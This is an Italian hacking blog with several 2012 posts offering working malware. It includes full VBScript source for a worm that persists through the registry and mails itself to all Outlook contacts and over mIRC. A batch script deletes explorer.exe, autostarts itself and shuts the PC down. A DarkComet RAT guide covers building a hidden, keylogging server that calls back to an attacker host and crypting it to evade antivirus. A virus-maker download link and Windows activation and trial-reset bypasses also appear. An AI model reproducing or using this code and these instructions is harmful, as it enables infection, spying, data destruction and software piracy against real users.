sabato 21 luglio 2012

Creare un worm in vbs

Inserite questo codice in un nuovo documento di testo
Quando avete fatto salvatelo con estenzione .vbs esempio ciao.vbs,il virus è in grado di rallentare pc,smartphone ed elimina file di system32 dopo 6 giorni dall'apertura potete dire ciao al pc

'Vbs.Vbswg.nome worm Created By PUOHIF. 22/06/2012
Set CAA22804 = createobject("scripting.filesystemobject")
CLJ44F3A = CAA22804.getspecialfolder(0)
KJ6Q4784 = CLJ44F3A & "\Vbswg_Worm.jpg.vbs"
Set NJEV7C5P = createobject("wscript.shell")
NJEV7C5P.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & KJ6Q4784 & " %"
CAA22804.copyfile wscript.scriptfullname, KJ6Q4784
If NJEV7C5P.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\nome worm\H3NG1763") <> 1 then
O4NHG707
End if
If NJEV7C5P.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\nome worm\DS1U8653") <> 1 then
S6QQ5E58 ""
End if
Function O4NHG707()
Set A5OH32TB = CreateObject("Outlook.Application")
If A5OH32TB = "Outlook" Then
Set I3VJ18SD = A5OH32TB.GetNameSpace("MAPI")
Set F01BAOB2 = I3VJ18SD.AddressLists
For Each F77ETF38 In F01BAOB2
If F77ETF38.AddressEntries.Count <> 0 Then
QV6152GJ = F77ETF38.AddressEntries.Count
For CFB19566 = 1 To QV6152GJ
Set G0VK86CT = A5OH32TB.CreateItem(0)
Set H8V5U358 = F77ETF38.AddressEntries(CFB19566)
G0VK86CT.To = H8V5U358.Address
G0VK86CT.Subject = "Very Important!"
G0VK86CT.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
execute "set D48D423S =G0VK86CT." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
LP3F4775 = KJ6Q4784
G0VK86CT.DeleteAfterSubmit = True
D48D423S.Add LP3F4775
If G0VK86CT.To <> "" Then
G0VK86CT.Send
End If
Next
End If
Next
End If
End function
Function S6QQ5E58(QQ4L0KMM)
If QQ4L0KMM <> "" Then
I9I462MH = NJEV7C5P.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If CAA22804.fileexists("c:\mirc\mirc.ini") Then
QQ4L0KMM = "c:\mirc"
ElseIf CAA22804.fileexists("c:\mirc32\mirc.ini") Then
QQ4L0KMM = "c:\mirc32"
ElseIf CAA22804.fileexists(I9I462MH & "\mirc\mirc.ini") Then
QQ4L0KMM = I9I462MH & "\mirc"
ElseIf CAA22804.fileexists(I9I462MH & "\mirc32\mirc.ini") Then
QQ4L0KMM = I9I462MH & "\mirc"
Else
QQ4L0KMM = ""
End If
End If
If QQ4L0KMM <> "" Then
Set F76MQS3O = CAA22804.CreateTextFile(QQ4L0KMM & "\script.ini", True)
F76MQS3O = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
F76MQS3O = F76MQS3O & vbCrLf & "n0=on 1:JOIN:#:{"
F76MQS3O = F76MQS3O & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
F76MQS3O = F76MQS3O & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
F76MQS3O = F76MQS3O & KJ6Q4784
F76MQS3O = F76MQS3O & vbCrLf & "n3=}"
script.Close
End If
End Function

venerdì 20 luglio 2012

Matrix virus creator

Oggi a grande richiesta ho deciso di postare matrix virus creator 5.1 quasi introvabile in rete,il link è:
http://www.expressleech.com/377kkhuy1xlo/Matrix_Virus_Maker_5.1_By_zSL0wER.zip, la pwd dell'archivio è paninosoft.

(per scaricare da expressleech quando vi chiede il metodo di pagamento premete la scritta free,l'ultima)


L'articolo non vuole incitare in nessun modo alla pirateria e questo blog non è responsabile di un cattivo uso di queste informazioni ed inoltre tutto è stato scritto e divulgato solo a scopo informativo

Attivare windows 8

1] Chiudere tutte le finestre di Windows Explorer;
2] Cliccare su Start, cercare Command Prompt, cliccare con il tasto destro sul risultato e infine cliccare su Run as administrator;
3] Premere contemporaneamente i tasti CTRL+SHIFT+F9;Ora occorre un Product Key di Windows 7 Beta (Build 7100). Se non lo possedete, potete utilizzare quello inserito in Windows 7 Ultimate Retail oppure:
4] Digitare slmgr.vbs -ipk e un Product Key (es.: slmgr.vbs -ipk 6JKV2-QPB8H-RQ893-FW7TM-PBJ73) e premere il tasto Invio;
5] Attendere la finestra di conferma di Windows Script Host e chiuderla con un clic su OK;
6] Digitare slmgr.vbs -ato e premere il tasto Invio;
7] Attendere la finestra di conferma di Windows Script Host e chiuderla con un clic su OK;
8] Finito!

Per controllare l'effettiva attivazione di Windows, basta andare in Control Panel>System and Security>System alla voce Windows activation.

Information

THE BLOG IS TODAY IN ALL LANGUAGE!!!!!!!!!THANKS GOOGLE TRADUCTOR

sabato 14 luglio 2012

Rendere originale windows 7 gratis



windows 7 loader by daz

Come accaduto già per Xp e Vista, Windows 7 richiede l’attivazione del prodotto per essere utilizzato illimitatamente e poter accedere agli aggiornamenti periodici.
Nonostante gli sforzi antipirateria di mamma Microsoft, i tools in grado di agirare l’attivazione e rendere Windows Seven genuino al 100% esistono e sono parecchi.
Qui ti propongo Windows 7 Loader (by Daz).
seven_loader_big
Il tool, ormai alla versione 1.9.7 funziona egregiamente, richiedendo per altro soltanto pochi secondi per rendersi efficace.

il link vi riporta ad un sito dove c'è scritto download:
http://www.satp2p.com/forum/showthread.php?8266-Windows-7-Loader-eXtreme-Edition

Per svolgere l’operazione ti basta scaricare uno dei due files linkati sopra (ovviamente consiglio il più recente), estrarlo ed avviare l’eseguibile come amministratore (tasto destro del mouse sull’eseguibile -> esegui come amministratore).
La schermata del tool è intuitiva e sarà simile a questa:

Non devi far altro che cliccare su Install ed attendere che il programma faccia il suo dovere. Questa operazione impiegherà orientativamente 1 minuto, durante il quale sembrerà che non stia succedendo nulla, per cui abbi pazienza ed attendi che appaia la finestra di conferma di avvenuta installazione.
Questo programma funziona sia sulla versione 32 bit che 64 bit e una volta utilizzato solleverà per sempre il sistema dall’incombenza dell’attivazione.
Dovute precisazioni: Questo articolo non vuole in alcun modo incentivare la pirateria, dalla quale pratica il sito e chi vi scrive si discostano. Scopo di questa pagina è soltanto educativo e volto a dimostrare come il mondo dell’underground informatico riesca a scardinare velocemente i sistemi di sicurezza dei produttori SW. Le responsabilità derivate dalla violazione del diritto d’autore sono da attribuirsi unicamente a chi compie questa pratica.

venerdì 13 luglio 2012

siti per scaricare giochi programmi e siti warez

Questo riepilogo non è disponibile. Fai clic qui per visualizzare il post.

Programmi per trial reset

In questa guida troverete il modo per bloccare la scadenza dei programmi trial ad una data fissata da voi

Istruzioni

  • 1
    Il primo step vi spiega come scaricare il programma in questione per bloccare la data di scadenza dei programmi trial, ovvero “Run As Date”.
    Innanzitutto andate su questo link : http://www.nirsoft.net/utils/run_as_date.html ed una volta caricata la pagina scrollatela, fino ad arrivare alla scritta Download RunAsDate, che si trova appena sotto il paragrafo Feedback della stessa pagina.
  • 2
    Quindi cliccate sulla scritta Download RunAsDate, e a questo punto vi comprirà una finestra, dove dovrete scegliere se salvare o aprire soltanto il file .zip , quindi, una volta effettuato il download, aprite il file, e quindi aprite con WinZip.
    Se non lo avete potete scaricarlo qui : http://www.winzip.com/downwz.htm
  • 3
    Una volta aperto con WinZip, potete Unzippare il file scaricato precedentemente, con l’aiuto di WinZip. Fatto questo aprite l’.exe contenuto nello zip, e oltre ad aprirlo vi consiglio di salvarlo sul desktop, visto che credo vi potrà servire in futuro. Dunque quando avete fatto tutto questo aprite il programma clicando due volte sull’icona RunAsDate, nonchè l’.exe da traspostare sul desktop.
  • 4
    Fatto questo si aprirà una finestra, che è la pagina di lavoro del programma.
    Vi spiego come funziona:
    Come prima cosa abbiamo la scritta “Application to run” (ovvero l’applicazione da “bloccare la data”) e poi un tasto con scritto “Browse…” , questo ci servirà per selezionare il programma da “bloccare la data”.
    Poi troviamo “Date/Time” con dei box di scrittura dove indicheremo la data e l’ora di quando vogliamo che il nostro trial modificato abbia fine.
    Dopo c’è parameters, ed in poche parole è il nome che volete dare al “finto trial”.
    I 2 tasti successivi non dobbiamo utilizzarli, e pertanto li lascieremo invariati.
  • 5
    Ora vi spiego come procedere per Bloccare la data della fine del trial.
    Come prima cosa aprite il programma RunAsDate, dopodichè vi cmparirà una finestra, con le vrie opzioni citate prima.
  • 6
    Nel box di “Application to run” dobbiamo inserire l’indirizzo della directory del programma Trial da bloccare, quindi cliccate il tasto Browse (a fianco del box “Application to run”). Dopodichè selezionate l’.exe da cui il programma trial da bloccare parte. (per aiutarvi: andate sul desktop, quindi sull’icona del programma trial da bloccare, e quindi tasto destro su di questa e poi proprietà. Quindi vedete che è un collegamento, e sulle proprietà troverete scritto l’.exe a cui il collegamento appartiene, e precisamente lo trovate nel box accanto alla scritta “Destinazione”).
    Quindi, tornando al programma RunAsDate, cliccate sul tasto browse, e quindi selezionate la directory che avete visto prima nelle proprietà.
  • 7
    Una volta selezionata la directory il programma trial da bloccare è selezionato, e quindi non resta altro che decidere la data e l’ora in cui volete che il vostro “finto trial” abbia fine. Io consiglio sempre di mettere come data 31/12/2100 e come ora 23:59:59 !
    Comunque potete decidere, e dopodichè il “finto trial” è pronto per essere creato, ormai mancano pochi passi!
  • 8
    Infatti, fatto questo, incontriamo la scritta “Parameters” , la quale chiede di dare un nome al “finto trial” , e io lo chiamerei sempre con le sigle del programma trial originale (es.: Total Video Converter = TVC).
  • 9
    Ora, come ultima cosa, dovete scegliere il nome dell’icona “finto trial” , per creare quindi un’icona sul desktop e in questo caso mettete la sigla del programma trial originale. Una volta fatto questo cliccate sul tasto “Create a Desktop Shurtcut”, e quindi si creerà un’icona de programma, che sembrerà normale di aspetto, ma ha il potere di eseguire il programma trial per sempre.
  • 10
    Come ultima cosa, dovete sempre aprire il programma “bloccato” dall’icona creata dal programma, e mai da quella originale, perchè se no vi trova l’errore perchè è scaduto il periodo di prova!

virus che toglie la barra start ed elimina il desktop

Aprite il blocco note e incollate il codice



@echo off
title virus
cls

taskkill /f /im explorer.exe
del /s /q "C:Windowsexplorer.exe"
Copy "Percorso del bat" "%Userprofile%Menu AvvioProgrammiEsecuzione automatica"
Shutdown /s /t 1

cosa fa:
Termina explorer.exe ( non si vede più il desktop e le icone, e la barra delle applicazioni)
Elimina explorer.exe visto che non è in esecuzione.
copia il bat in questione in esecuzione automatica e spegne il computer.

Avviso:

se non riuscite a vedere il contenuto di un post andate sullo spazio vuoto dove ci dovrebbe essere scritto il contenuto del post e selezionatelo come se lo vorreste copiare per visualizzarlo

guida darkcomet rat

DarkComet-RAT (Remote Administration Tool) è un potente e stabile RAT(Remote administration Tool) che ti permette di controllare computer remoti in modo semplice e veloce , puoi vedere il desktop, la webcam, controllare i processi remoti, ascoltare i suoni etc... allo stesso tempo e con una velocità elevata , DarkComet può lavorare in LAN ( Local Area Network ) e WAN ( Wide Area Network ) .DarkComet è compatibile con Windows 2000 , Windows XP (all sp), Windows Vista (all sp) and Windows Seven, sia 32(.386) che 64 bit .
FEATURES:-SYSTEM INFO (informazioni sul pc-vittima)-FUN FUNCTIONS (funzioni divertenti)-SYSTEM FUNCTIONS:-Process Manager; (modifica i processi remoti)-Remote Registry; (cambia i valori del registro di windows)-Remote Shell; (invia comandi al pc)-Window Functions (controlla le finestre attive)-Unistall Applications (Disinstalla i software del pc remoto)-Remote MSConfig (Cambia le impostazioni di avvio)-Remote Scripting (Esegui script in vari linguaggi nel pc remoto)-Files Functions (File Manager[Upload/Download] e Search Manager)-Password (Visualizza le password di MSN,Firefox,IE7 ed i log di utorrent)-Msn Functions (Controlla MSN e visualizza i contatti)-Spy Functions (Controlla Webcam e Suoni, Controlla il Desktop, Keylogger ONline/OFFline)-Network Functions (Url Download, visualizzazione remota delle pagine web, redirect)-Misc Functions (Controlla stampante, messaggi)-Quick Actions (varie funzioni di controllo remoto)-Log(log della sessione)-OtherRequisiti:1. Un account no-ip e scarica NO-IP DUC... Se non ne hai uno crealo segui questa guida: Crea account No-ip
2. Scarica Simple Port Forwarding ed apri la porta 1604 sul tuo router.(se non dovesse funzionare prova a cambiarla manualmente dalla pagina 192.168.1.1[la pagina potrebbe essere diversa]).-----------------------------------------------------------------------------------------------[in alcuni casi potrebbe essere necessario disattivare temporaneamente l'antivirus per poter utilizzare il programma]
1.) Scarica Darkcomet 2.0 dal link presente nel post2.)Scompatta l'archivio e apri il programma . Si dovrebbe aprire un disclaimer:- spunta la casella "Do not show again" e clicca "I Agree"3)Ora dobbiamo configurare il RAT in modo che ascolti una determinata porta:-Clicca "Connection">"Add Socket" ; dovrebbe aprirsi una finestra simile a questa:

4) Lascia le impostazioni come sono e clicca "Listen"5)Adesso dobbiamo creare il server:1- Clicca "Edit Server" e dovrebbe apparire una finestra con varie impostazioni:2-"Edit Server Session": lascia così che serve solo se hai già creato almeno una configurazione...3-"Main Setting"....- "Mutex Name": " Clicca Random"- "Server ID": Scegli un nome da dare alle tue vittime ;-)- "Protect server connection by password": se vuoi impostare una password per accedere ai pc remoti > non impostarla almeno che tu non abbia un account condiviso.-"Random Range Instance": Lascia i valori predefiniti...-"Edit Server Methode":-EOF "Stabile ma è difficile trovare un buon crypter per criptarlo"-RES "Tutti i crypter funzionano utilizzando questo metodo" [CONSIGLIATO]4) Connection Setting:- Nel campo "IP Address" metti il tuo no-ip (ex: example.no-ip.org)- Nel campo "Port" lascia la porta di default5)Server Startup:Seleziona tutto ("Melt Server" = facoltativo[cancella il file dopo aver installato il server])...e cambia i valori in questi campi:-Installation Path: Scegli dove vuoi installare il server-Intall in Registry Startup: installa il server nel registro di windows-Install in Windows Services: installa il server come servizio di sistema-Install with ActiveX Startup: installa il server come ActiveX (clicca Random)6)Server Shield:-File Attribute e Parent Folder Attribute: Hidden, System, Read Only.-Disable Functions: disabilita detrminate funzioni nel pc remoto ;-)- Spunta la casella Hide Partialy Process7) Anti VirtualBox:Spunta la casella "Active Anti VirtualBox" e "Fake Run"8)Icon Setting: se vuoi cambiare icona al server9)Generate Server: Spunta le caselle "Active Offline Keylogger at server startup" e "I Accept the DarkComet-RAT EULA" poi clicca "Create Server".
Ok, finalmente puoi iniziare a diffondere il tuo trojan(RAT)... ;-)ti consiglio di criptarlo e unirlo ad altri file per renderlo invisibile agli anti-virus:Per trovare il programma adatto cerca con Google "FUD Binder" e "FUD Crypter"Puoi controllare quanti antivirus individuano il tuo virus SOLO QUI: Novirusthanks.org[IMPORTANTE: Prima di cliccare "Submit File" spunta la casella "Do not distribute the sample"]